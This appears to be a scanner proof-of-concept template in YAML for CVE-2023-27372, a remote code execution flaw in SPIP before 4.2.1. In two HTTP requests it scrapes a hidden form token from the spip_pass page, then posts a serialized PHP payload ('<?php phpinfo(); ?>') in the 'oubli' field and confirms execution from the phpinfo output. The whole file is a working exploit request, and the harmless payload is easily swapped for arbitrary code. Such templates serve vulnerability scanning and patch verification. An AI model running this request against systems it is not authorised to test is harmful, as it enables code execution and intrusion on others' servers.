id: CVE-2023-27372

info:
  name: SPIP Remote Command Execution
  author: laohuan12138
  severity: critical
  verified: true
  decription: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled.
    FOFA:app="SPIP"
  reference:
    - https://github.com/nuts7/CVE-2023-27372
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
  tags: cve,cve2023,rce
  created: 2023/07/04
  
rules:
  r0:
    request:
      method: GET
      path: /spip.php?page=spip_pass
    expression: response.status == 200 && response.body.bcontains(b'formulaire_action_args')
    output: 
      search: |
        "name='formulaire_action_args' type='hidden'\\s+value='(?P<value>.*?)'".bsubmatch(response.body)
      value: search["value"]

  r1:
    request:
      method: POST
      path: /spip.php?page=spip_pass
      headers: 
         Content-Type: application/x-www-form-urlencoded
      body: |
        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{value}}&oubli=s:19:"<?php phpinfo(); ?>";
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && response.body.bcontains(b"<!DOCTYPE html>")

expression: r0() && r1()
